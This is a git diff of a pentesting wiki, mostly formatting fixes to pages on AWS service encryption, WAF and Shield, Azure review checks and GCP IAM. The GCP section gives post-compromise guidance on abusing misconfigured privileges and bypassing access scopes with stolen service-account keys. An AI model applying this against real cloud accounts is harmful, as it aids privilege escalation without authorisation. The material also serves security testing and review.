 One key point of EMR is that **by default, the instances within a cluster do not encrypt data at rest**. Once enabled, the following features are available.
 
-* **Linux Unified Key Setup:** EBS cluster volumes can be encrypted using this method whereby you can specify AWS **KMS **to be used as your key management provider, or use a custom key provider.
+* **Linux Unified Key Setup:** EBS cluster volumes can be encrypted using this method whereby you can specify AWS **KMS** to be used as your key management provider, or use a custom key provider.
 * **Open-Source HDFS encryption:** This provides two Hadoop encryption options. Secure Hadoop RPC which would be set to privacy which uses simple authentication security layer, and data encryption of HDFS Block transfer which would be set to true to use the AES-256 algorithm.
 
-From an encryption in transit perspective, you could enable **open source transport layer security **encryption features and select a certificate provider type which can be either PEM where you will need to manually create PEM certificates, bundle them up with a zip file and then reference the zip file in S3 or custom where you would add a custom certificate provider as a Java class that provides encryption artefacts.
+From an encryption in transit perspective, you could enable **open source transport layer security** encryption features and select a certificate provider type which can be either PEM where you will need to manually create PEM certificates, bundle them up with a zip file and then reference the zip file in S3 or custom where you would add a custom certificate provider as a Java class that provides encryption artefacts.
 
-Once the TLS certificate provider has been configured in the security configuration file, the following encryption applications specific encryption features can be enabled which will vary depending on your EMR version. 
+Once the TLS certificate provider has been configured in the security configuration file, the following encryption applications specific encryption features can be enabled which will vary depending on your EMR version.&#x20;
 
 * Hadoop might reduce encrypted shuffle which uses TLS. Both secure Hadoop RPC which uses Simple Authentication Security Layer, and data encryption of HDFS Block Transfer which uses AES-256, are both activated when at rest encryption is enabled in the security configuration.
-* Presto: When using EMR version 5.6.0 and later, any internal communication between Presto nodes will use SSL and TLS. 
+* Presto: When using EMR version 5.6.0 and later, any internal communication between Presto nodes will use SSL and TLS.&#x20;
 * Tez Shuffle Handler uses TLS.
 * Spark: The Akka protocol uses TLS. Block Transfer Service uses Simple Authentication Security Layer and 3DES. External shuffle service uses the Simple Authentication Security Layer.
 
 ## RDS - Relational Database Service
 
-RDS allows you to set up a **relational database **using a number of** different engines **such as MySQL, Oracle, SQL Server, etc. During the creation of your RDS database instance, you have the opportunity to **Enable Encryption at the Configure Advanced Settings** screen under Database Options and Enable Encryption.
+RDS allows you to set up a **relational database** using a number of **different engines** such as MySQL, Oracle, SQL Server, etc. During the creation of your RDS database instance, you have the opportunity to **Enable Encryption at the Configure Advanced Settings** screen under Database Options and Enable Encryption.
 
-By enabling your encryption here, you are enabling** encryption at rest for your storage, snapshots, read replicas and your back-ups**. Keys to manage this encryption can be issued by using **KMS**. It's not possible to add this level of encryption after your database has been created. **It has to be done during its creation**.
+By enabling your encryption here, you are enabling **encryption at rest for your storage, snapshots, read replicas and your back-ups**. Keys to manage this encryption can be issued by using **KMS**. It's not possible to add this level of encryption after your database has been created. **It has to be done during its creation**.
 
 However, there is a **workaround allowing you to encrypt an unencrypted database as follows**. You can create a snapshot of your unencrypted database, create an encrypted copy of that snapshot, use that encrypted snapshot to create a new database, and then, finally, your database would then be encrypted.
 
 Amazon RDS **sends data to CloudWatch every minute by default.**
 
-In addition to encryption offered by RDS itself at the application level, there are **additional platform level encryption mechanisms** that could be used for protecting data at rest including** Oracle and SQL Server Transparent Data Encryption**, known as TDE, and this could be used in conjunction with the method order discussed but it would** impact the performance** of the database MySQL cryptographic functions and Microsoft Transact-SQL cryptographic functions.
+In addition to encryption offered by RDS itself at the application level, there are **additional platform level encryption mechanisms** that could be used for protecting data at rest including **Oracle and SQL Server Transparent Data Encryption**, known as TDE, and this could be used in conjunction with the method order discussed but it would **impact the performance** of the database MySQL cryptographic functions and Microsoft Transact-SQL cryptographic functions.
 
 If you want to use the TDE method, then you must first ensure that the database is associated to an option group. Option groups provide default settings for your database and help with management which includes some security features. However, option groups only exist for the following database engines and versions.
 
@@ -777,17 +777,17 @@ Once the database is associated with an option group, you must ensure that the O
 
 ## Amazon Kinesis Firehouse
 
-Amazon Firehose is used to deliver **real-time streaming data to different services **and destinations within AWS, many of which can be used for big data such as S3 Redshift and Amazon Elasticsearch.
+Amazon Firehose is used to deliver **real-time streaming data to different services** and destinations within AWS, many of which can be used for big data such as S3 Redshift and Amazon Elasticsearch.
 
-The service is fully managed by AWS, taking a lot of the administration of maintenance out of your hands. Firehose is used to receive data from your data producers where it then automatically delivers the data to your chosen destination. 
+The service is fully managed by AWS, taking a lot of the administration of maintenance out of your hands. Firehose is used to receive data from your data producers where it then automatically delivers the data to your chosen destination.&#x20;
 
 Amazon Streams essentially collects and processes huge amounts of data in real time and makes it available for consumption.
 
 This data can come from a variety of different sources. For example, log data from the infrastructure, social media, web clicks during feeds, market data, etc. So now we have a high-level overview of each of these. We need to understand how they implement encryption of any data process in stored should it be required.
 
-When clients are **sending data to Kinesis in transit**, the data can be sent over **HTTPS**, which is HTTP with SSL encryption. However, once it enters the Kinesis service, it is then unencrypted by default. Using both **Kinesis Streams and Firehose encryption, you can assure your streams remain encrypted up until the data is sent to its final destination. **As **Amazon Streams **now has the ability to implement SSE encryption using KMS to **encrypt data as it enters the stream** directly from the producers.
+When clients are **sending data to Kinesis in transit**, the data can be sent over **HTTPS**, which is HTTP with SSL encryption. However, once it enters the Kinesis service, it is then unencrypted by default. Using both **Kinesis Streams and Firehose encryption, you can assure your streams remain encrypted up until the data is sent to its final destination.** As **Amazon Streams** now has the ability to implement SSE encryption using KMS to **encrypt data as it enters the stream** directly from the producers.
 
-If Amazon **S3 **is used as a **destination**, Firehose can implement encryption using **SSE-KMS on S3**.
+If Amazon **S3** is used as a **destination**, Firehose can implement encryption using **SSE-KMS on S3**.
 
 As a part of this process, it's important to ensure that both producer and consumer applications have permissions to use the KMS key. Otherwise encryption and decryption will not be possible, and you will receive an unauthorized KMS master key permission error.
 
@@ -839,26 +839,26 @@ So there are a number of essential components relating to WAF, these being: Cond
 
 Conditions allow you to specify **what elements of the incoming HTTP or HTTPS request you want WAF to be monitoring** (XSS, GEO - filtering by location-, IP address, Size constraints, SQL Injection attacks, strings and regex matching). Note that if you are restricting a country from cloudfront, this request won't arrive to the waf.
 
-You can have** 100 conditions of each type**, such as Geo Match or size constraints, however **Regex** is the **exception **to this rule where **only 10 Regex** conditions are allowed but this limit is possible to increase. You are able to have **100 rules and 50 Web ACLs per AWS account**. You are limited to **5 rate-based-rules **per account. Finally you can have **10,000 requests per second **when **using WAF** within your application load balancer.
+You can have **100 conditions of each type**, such as Geo Match or size constraints, however **Regex** is the **exception** to this rule where **only 10 Regex** conditions are allowed but this limit is possible to increase. You are able to have **100 rules and 50 Web ACLs per AWS account**. You are limited to **5 rate-based-rules** per account. Finally you can have **10,000 requests per second** when **using WAF** within your application load balancer.
 
 ### Rules
 
 Using these conditions you can create rules: For example, block request if 2 conditions are met.\
-When creating your rule you will be asked to select a **Rule Type**: **Regular Rule** or **Rate-Based Rule**. 
+When creating your rule you will be asked to select a **Rule Type**: **Regular Rule** or **Rate-Based Rule**.&#x20;
 
-The only **difference **between a rate-based rule and a regular rule is that **rate-based** rules **count **the **number **of **requests **that are being received from a particular IP address over a time period of **five minutes**.
+The only **difference** between a rate-based rule and a regular rule is that **rate-based** rules **count** the **number** of **requests** that are being received from a particular IP address over a time period of **five minutes**.
 
-When you select a rate-based rule option, you are asked to **enter the maximum number of requests from a single IP within a five minute time frame**. When the count limit is **reached**,** all other requests from that same IP address is then blocked**. If the request rate falls back below the rate limit specified the traffic is then allowed to pass through and is no longer blocked. When setting your rate limit it **must be set to a value above 2000**. Any request under this limit is considered a Regular Rule.
+When you select a rate-based rule option, you are asked to **enter the maximum number of requests from a single IP within a five minute time frame**. When the count limit is **reached**, **all other requests from that same IP address is then blocked**. If the request rate falls back below the rate limit specified the traffic is then allowed to pass through and is no longer blocked. When setting your rate limit it **must be set to a value above 2000**. Any request under this limit is considered a Regular Rule.
 
 ### Actions
 
-An action is applied to each rule, these actions can either be **Allow**, **Block **or **Count**.
+An action is applied to each rule, these actions can either be **Allow**, **Block** or **Count**.
 
-* When a request is **allowed**, it is **forwarded **onto the relevant CloudFront distribution or Application Load Balancer.
-* When a request is **blocked**, the request is **terminated **there and no further processing of that request is taken.
-* A **Count **action will **count the number of requests that meet the conditions** within that rule. This is a really good option to select when testing the rules to ensure that the rule is picking up the requests as expected before setting it to either Allow or Block.
+* When a request is **allowed**, it is **forwarded** onto the relevant CloudFront distribution or Application Load Balancer.
+* When a request is **blocked**, the request is **terminated** there and no further processing of that request is taken.
+* A **Count** action will **count the number of requests that meet the conditions** within that rule. This is a really good option to select when testing the rules to ensure that the rule is picking up the requests as expected before setting it to either Allow or Block.
 
-If an **incoming request does not meet any rule** within the Web ACL then the request takes the action associated to a** default action** specified which can either be **Allow **or **Block**. An important point to make about these rules is that they are **executed in the order that they are listed within a Web ACL**. So be careful to architect this order correctly for your rule base, **typically **these are **ordered **as shown: 
+If an **incoming request does not meet any rule** within the Web ACL then the request takes the action associated to a **default action** specified which can either be **Allow** or **Block**. An important point to make about these rules is that they are **executed in the order that they are listed within a Web ACL**. So be careful to architect this order correctly for your rule base, **typically** these are **ordered** as shown:&#x20;
 
 1. WhiteListed Ips as Allow.
 2. BlackListed IPs Block
@@ -872,7 +872,7 @@ WAF CloudWatch metrics are reported **in one minute intervals by default** and a
 
 AWS Firewall Manager simplifies your administration and maintenance tasks across multiple accounts and resources for **AWS WAF, AWS Shield Advanced, Amazon VPC security groups, and AWS Network Firewall**. With Firewall Manager, you set up your AWS WAF firewall rules, Shield Advanced protections, Amazon VPC security groups, and Network Firewall firewalls just once. The service **automatically applies the rules and protections across your accounts and resources**, even as you add new resources.
 
-It can **group and protect specific resources together**, for example, all resources with a particular tag or all of your CloudFront distributions. One key benefit of Firewall Manager is that it** automatically protects certain resources that are added** to your account as they become active.
+It can **group and protect specific resources together**, for example, all resources with a particular tag or all of your CloudFront distributions. One key benefit of Firewall Manager is that it **automatically protects certain resources that are added** to your account as they become active.
 
 **Requisites**: Created a Firewall Manager Master Account, setup an AWS organization and have added our member accounts and enable AWS Config.
 
@@ -884,9 +884,9 @@ A **rule group** (a set of WAF rules together) can be added to an AWS Firewall M
 
 AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS.
 
-**AWS Shield Standard** is **free **to everyone, and it offers DDoS **protection **against some of the more common layer three, the **network layer**, and layer four,** transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53. 
+**AWS Shield Standard** is **free** to everyone, and it offers DDoS **protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53.&#x20;
 
-**AWS Shield advanced** offers a** greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**.
+**AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**.
 
 Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.**
 
@@ -916,34 +916,34 @@ In addition, take the following into consideration when you use Site-to-Site VPN
 
 * When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks.
 
-### Components of Client VPN <a href="what-is-components" id="what-is-components"></a>
+### Components of Client VPN <a href="#what-is-components" id="what-is-components"></a>
 
 **Connect from your machine to your VPC**
 
 #### Concepts
 
-*  **Client VPN endpoint: **The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated.
-*  **Target network: **A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone.
+* &#x20;**Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated.
+* &#x20;**Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone.
 * **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks.
-*  **Authorization rules: **An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks.
-* **Client: **The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session.
-* **Client CIDR range: **An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. You choose the client CIDR range, for example, `10.2.0.0/16`.
-* **Client VPN ports: **AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443.
-* **Client VPN network interfaces: **When you associate a subnet with your Client VPN endpoint, we create Client VPN network interfaces in that subnet. **Traffic that's sent to the VPC from the Client VPN endpoint is sent through a Client VPN network interface**. Source network address translation (SNAT) is then applied, where the source IP address from the client CIDR range is translated to the Client VPN network interface IP address.
-* **Connection logging: **You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues.
-* **Self-service portal: **You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client.
+* &#x20;**Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks.
+* **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session.
+* **Client CIDR range:** An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. You choose the client CIDR range, for example, `10.2.0.0/16`.
+* **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443.
+* **Client VPN network interfaces:** When you associate a subnet with your Client VPN endpoint, we create Client VPN network interfaces in that subnet. **Traffic that's sent to the VPC from the Client VPN endpoint is sent through a Client VPN network interface**. Source network address translation (SNAT) is then applied, where the source IP address from the client CIDR range is translated to the Client VPN network interface IP address.
+* **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues.
+* **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client.
 
 #### Limitations
 
 * **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table.
 * Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.**
-* A **portion of the addresses** in the client CIDR range are used to** support the availability** model of the Client VPN endpoint, and cannot be assigned to clients. Therefore, we recommend that you **assign a CIDR block that contains twice the number of IP addresses that are required **to enable the maximum number of concurrent connections that you plan to support on the Client VPN endpoint.
-* The** client CIDR range cannot be changed** after you create the Client VPN endpoint.
+* A **portion of the addresses** in the client CIDR range are used to **support the availability** model of the Client VPN endpoint, and cannot be assigned to clients. Therefore, we recommend that you **assign a CIDR block that contains twice the number of IP addresses that are required** to enable the maximum number of concurrent connections that you plan to support on the Client VPN endpoint.
+* The **client CIDR range cannot be changed** after you create the Client VPN endpoint.
 * The **subnets** associated with a Client VPN endpoint **must be in the same VPC**.
 * You **cannot associate multiple subnets from the same Availability Zone with a Client VPN endpoint**.
 * A Client VPN endpoint **does not support subnet associations in a dedicated tenancy VPC**.
-* Client VPN supports **IPv4 **traffic only.
-* Client VPN is **not **Federal Information Processing Standards (**FIPS**) **compliant**.
+* Client VPN supports **IPv4** traffic only.
+* Client VPN is **not** Federal Information Processing Standards (**FIPS**) **compliant**.
 *   If multi-factor authentication (MFA) is disabled for your Active Directory, a user password cannot be in the following format.
 
     ```
@@ -953,13 +953,13 @@ In addition, take the following into consideration when you use Site-to-Site VPN
 
 ## Amazon Cognito
 
-Amazon Cognito provides **authentication, authorization, and user management** for your web and mobile apps. Your users can sign in directly with a **user name and password**, or through a** third party** such as Facebook, Amazon, Google or Apple.
+Amazon Cognito provides **authentication, authorization, and user management** for your web and mobile apps. Your users can sign in directly with a **user name and password**, or through a **third party** such as Facebook, Amazon, Google or Apple.
 
 The two main components of Amazon Cognito are user pools and identity pools. **User pools** are user directories that provide **sign-up and sign-in options for your app users**. **Identity pools** enable you to grant your users **access to other AWS services**. You can use identity pools and user pools separately or together.
 
-###  **User pools**
+### &#x20;**User pools**
 
-A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app **through Amazon Cognito, **or federate **through a **third-party **identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK.
+A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK.
 
 User pools provide:
 
diff --git a/cloud-security/cloud-security-review.md b/cloud-security/cloud-security-review.md
index 624ce875..4facc321 100644
--- a/cloud-security/cloud-security-review.md
+++ b/cloud-security/cloud-security-review.md
@@ -48,8 +48,8 @@ To start the tests you should have access with a user with **Reader permissions
 It is recommended to **install azure-cli** in a **linux** and **windows** virtual machines (to be able to run powershell and python scripts): [https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest)\
 Then, run `az login` to login. Note the **account information** and **token** will be **saved** inside _\<HOME>/.azure_ (in both Windows and Linux).
 
-Remember that if the **Security Centre Standard Pricing Tier** is being used and **not** the **free** tier, you can **generate** a **CIS compliance scan report** from the azure portal. Go to _Policy & Compliance-> Regulatory Compliance_ (or try to access [https://portal.azure.com/#blade/Microsoft_Azure_Security/SecurityMenuBlade/22](https://portal.azure.com/#blade/Microsoft_Azure_Security/SecurityMenuBlade/22)).\
-\__If the company is not paying for a Standard account you may need to review the **CIS Microsoft Azure Foundations Benchmark** by "hand" (you can get some help using the following tools). Download it from [**here**](https://www.newnettechnologies.com/cis-benchmark.html?keyword=\&gclid=Cj0KCQjwyPbzBRDsARIsAFh15JYSireQtX57C6XF8cfZU3JVjswtaLFJndC3Hv45YraKpLVDgLqEY6IaAhsZEALw_wcB#microsoft-azure).
+Remember that if the **Security Centre Standard Pricing Tier** is being used and **not** the **free** tier, you can **generate** a **CIS compliance scan report** from the azure portal. Go to _Policy & Compliance-> Regulatory Compliance_ (or try to access [https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/22](https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/22)).\
+\_\_If the company is not paying for a Standard account you may need to review the **CIS Microsoft Azure Foundations Benchmark** by "hand" (you can get some help using the following tools). Download it from [**here**](https://www.newnettechnologies.com/cis-benchmark.html?keyword=\&gclid=Cj0KCQjwyPbzBRDsARIsAFh15JYSireQtX57C6XF8cfZU3JVjswtaLFJndC3Hv45YraKpLVDgLqEY6IaAhsZEALw\_wcB#microsoft-azure).
 
 ### Run scanners
 
@@ -78,13 +78,13 @@ azscan #Run, login before with `az login`
 
 ### More checks
 
-* Check for a **high number of Global Admin** (between 2-4 are recommended). Access it on: [https://portal.azure.com/#blade/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/Overview](https://portal.azure.com/#blade/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/Overview)
+* Check for a **high number of Global Admin** (between 2-4 are recommended). Access it on: [https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/Overview](https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/Overview)
 * Global admins should have MFA activated. Go to Users and click on Multi-Factor Authentication button.
 
 ![](<../.gitbook/assets/image (293).png>)
 
 * Dedicated admin account shouldn't have mailboxes (they can only have mailboxes if they have Office 365).
-* Local AD shouldn't be sync with Azure AD if not needed([https://portal.azure.com/#blade/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/AzureADConnect](https://portal.azure.com/#blade/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/AzureADConnect)). And if synced Password Hash Sync should be enabled for reliability. In this case it's disabled:
+* Local AD shouldn't be sync with Azure AD if not needed([https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/AzureADConnect](https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/AzureADConnect)). And if synced Password Hash Sync should be enabled for reliability. In this case it's disabled:
 
 ![](<../.gitbook/assets/image (294).png>)
 
@@ -92,8 +92,8 @@ azscan #Run, login before with `az login`
 
 ![](<../.gitbook/assets/image (295).png>)
 
-* **Standard tier** is recommended instead of free tier (see the tier being used in _Pricing & Settings_ or in [https://portal.azure.com/#blade/Microsoft_Azure_Security/SecurityMenuBlade/24](https://portal.azure.com/#blade/Microsoft_Azure_Security/SecurityMenuBlade/24))
-*   **Periodic SQL servers scans**: 
+* **Standard tier** is recommended instead of free tier (see the tier being used in _Pricing & Settings_ or in [https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/24](https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/24))
+*   **Periodic SQL servers scans**:
 
     _Select the SQL server_ --> _Make sure that 'Advanced data security' is set to 'On'_ --> _Under 'Vulnerability assessment settings', set 'Periodic recurring scans' to 'On', and configure a storage account for storing vulnerability assessment scan results_ --> _Click Save_
 * **Lack of App Services restrictions**: Look for "App Services" in Azure ([https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites](https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites)) and check if anyone is being used. In that case check go through each App checking for "Access Restrictions" and there aren't rules, report it. The access to the app service should be restricted according to the needs.
@@ -108,3 +108,6 @@ Get objects in graph: [https://github.com/FSecureLABS/awspx](https://github.com/
 
 ## GPC
 
+{% content-ref url="gcp-security/" %}
+[gcp-security](gcp-security/)
+{% endcontent-ref %}
diff --git a/cloud-security/gcp-security/README.md b/cloud-security/gcp-security/README.md
index f56fbcb0..573d646a 100644
--- a/cloud-security/gcp-security/README.md
+++ b/cloud-security/gcp-security/README.md
@@ -2,7 +2,7 @@
 
 ![](<../../.gitbook/assets/image (629) (1) (1).png>)
 
-## Security concepts <a href="security-concepts" id="security-concepts"></a>
+## Security concepts <a href="#security-concepts" id="security-concepts"></a>
 
 ### **Resource hierarchy**
 
@@ -21,15 +21,15 @@ A virtual machine (called a Compute Instance) is a resource. A resource resides
 
 ### **IAM Roles**
 
-There are** three types** of roles in IAM:
+There are **three types** of roles in IAM:
 
 * **Basic/Primitive roles**, which include the **Owner**, **Editor**, and **Viewer** roles that existed prior to the introduction of IAM.
-* **Predefined roles**, which provide granular access for a specific service and are managed by Google Cloud. There are a lot of predefined roles, you can **see all of them with the privileges they have **[**here**](https://cloud.google.com/iam/docs/understanding-roles#predefined\_roles).
+* **Predefined roles**, which provide granular access for a specific service and are managed by Google Cloud. There are a lot of predefined roles, you can **see all of them with the privileges they have** [**here**](https://cloud.google.com/iam/docs/understanding-roles#predefined\_roles).
 * **Custom roles**, which provide granular access according to a user-specified list of permissions.
 
 There are thousands of permissions in GCP. In order to check if a role has a permissions you can [**search the permission here**](https://cloud.google.com/iam/docs/permissions-reference) and see which roles have it.
 
-**You can also **[**search here predefined roles**](https://cloud.google.com/iam/docs/understanding-roles#product\_specific\_documentation)** offered by each product.**
+**You can also** [**search here predefined roles**](https://cloud.google.com/iam/docs/understanding-roles#product\_specific\_documentation) **offered by each product.**
 
 #### Basic roles
 
@@ -68,7 +68,7 @@ gcloud compute instances get-iam-policy [INSTANCE] --zone [ZONE]
 
 ### **Service accounts**
 
-Virtual machine instances are usually **assigned a service account**. Every GCP project has a [default service account](https://cloud.google.com/compute/docs/access/service-accounts#default\_service\_account), and this will be assigned to new Compute Instances unless otherwise specified. Administrators can choose to use either a custom account or no account at all. This service account** can be used by any user or application on the machine** to communicate with the Google APIs. You can run the following command to see what accounts are available to you:
+Virtual machine instances are usually **assigned a service account**. Every GCP project has a [default service account](https://cloud.google.com/compute/docs/access/service-accounts#default\_service\_account), and this will be assigned to new Compute Instances unless otherwise specified. Administrators can choose to use either a custom account or no account at all. This service account **can be used by any user or application on the machine** to communicate with the Google APIs. You can run the following command to see what accounts are available to you:
 
 ```
 gcloud auth list
@@ -81,7 +81,7 @@ PROJECT_NUMBER-compute@developer.gserviceaccount.com
 PROJECT_ID@appspot.gserviceaccount.com
 ```
 
-A** custom service account **will look like this:
+A **custom service account** will look like this:
 
 ```
 SERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com
@@ -91,7 +91,7 @@ If `gcloud auth list` returns **multiple** accounts **available**, something int
 
 ### **Access scopes**
 
-The **service account** on a GCP Compute Instance will **use** **OAuth** to communicate with the Google Cloud APIs. When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the instance will **have a **[**scope**](https://oauth.net/2/scope/)** limitation included**. This defines **what API endpoints it can authenticate to**. It does **NOT define the actual permissions**.
+The **service account** on a GCP Compute Instance will **use** **OAuth** to communicate with the Google Cloud APIs. When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the instance will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. This defines **what API endpoints it can authenticate to**. It does **NOT define the actual permissions**.
 
 When using a **custom service account**, Google [recommends](https://cloud.google.com/compute/docs/access/service-accounts#service\_account\_permissions) that access scopes are not used and to **rely totally on IAM**. The web management portal actually enforces this, but access scopes can still be applied to instances using custom service accounts programatically.
 
@@ -128,7 +128,7 @@ This `cloud-platform` scope is what we are really hoping for, as it will allow u
 
 It is possible to encounter some **conflicts** when using both **IAM and access scopes**. For example, your service account may have the IAM role of `compute.instanceAdmin` but the instance you've breached has been crippled with the scope limitation of `https://www.googleapis.com/auth/compute.readonly`. This would prevent you from making any changes using the OAuth token that's automatically assigned to your instance.
 
-### Default credentials <a href="default-credentials" id="default-credentials"></a>
+### Default credentials <a href="#default-credentials" id="default-credentials"></a>
 
 **Default service account token**
 
@@ -151,7 +151,7 @@ Which will receive a response like the following:
  }
 ```
 
-This token is the **combination of the service account and access scopes** assigned to the Compute Instance. So, even though your service account may have **every IAM privilege **imaginable, this particular OAuth token **might be limited** in the APIs it can communicate with due to **access scopes**.
+This token is the **combination of the service account and access scopes** assigned to the Compute Instance. So, even though your service account may have **every IAM privilege** imaginable, this particular OAuth token **might be limited** in the APIs it can communicate with due to **access scopes**.
 
 **Application default credentials**
 
@@ -262,11 +262,11 @@ Supposing that you have compromised a VM in GCP, there are some **GCP privileges
 
 If you have found some [**SSRF vulnerability in a GCP environment check this page**](../../pentesting-web/ssrf-server-side-request-forgery.md#6440).
 
-## Cloud privilege escalation <a href="cloud-privilege-escalation" id="cloud-privilege-escalation"></a>
+## Cloud privilege escalation <a href="#cloud-privilege-escalation" id="cloud-privilege-escalation"></a>
 
-### GCP Interesting Permissions <a href="organization-level-iam-permissions" id="organization-level-iam-permissions"></a>
+### GCP Interesting Permissions <a href="#organization-level-iam-permissions" id="organization-level-iam-permissions"></a>
 
-The most common way once you have obtained some cloud credentials of has compromised some service running inside a cloud is to **abuse miss-configured privileges **the compromised account may have. So, the first thing you should do is to enumerate your privileges.
+The most common way once you have obtained some cloud credentials of has compromised some service running inside a cloud is to **abuse miss-configured privileges** the compromised account may have. So, the first thing you should do is to enumerate your privileges.
 
 Moreover, during this enumeration, remember that **permissions can be set at the highest level of "Organization"** as well.
 
@@ -274,9 +274,9 @@ Moreover, during this enumeration, remember that **permissions can be set at the
 [gcp-interesting-permissions.md](gcp-interesting-permissions.md)
 {% endcontent-ref %}
 
-### Bypassing access scopes <a href="bypassing-access-scopes" id="bypassing-access-scopes"></a>
+### Bypassing access scopes <a href="#bypassing-access-scopes" id="bypassing-access-scopes"></a>
 
-When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the computing instance (VM) will **have a **[**scope**](https://oauth.net/2/scope/)** limitation included**. However, you might be able to **bypass** this limitation and exploit the permissions the compromised account has.
+When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the computing instance (VM) will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. However, you might be able to **bypass** this limitation and exploit the permissions the compromised account has.
 
 The **best way to bypass** this restriction is either to **find new credentials** in the compromised host, to **find the service key to generate an OUATH token** without restriction or to **jump to a different VM less restricted**.
 
@@ -290,7 +290,7 @@ Also keep an eye out for instances that have the default service account assigne
 
 Google states very clearly [**"Access scopes are not a security mechanism… they have no effect when making requests not authenticated through OAuth"**](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam).
 
-Therefore, if you **find a **[**service account key**](https://cloud.google.com/iam/docs/creating-managing-service-account-keys)** **stored on the instance you can bypass the limitation. These are **RSA private keys** that can be used to authenticate to the Google Cloud API and **request a new OAuth token with no scope limitations**.
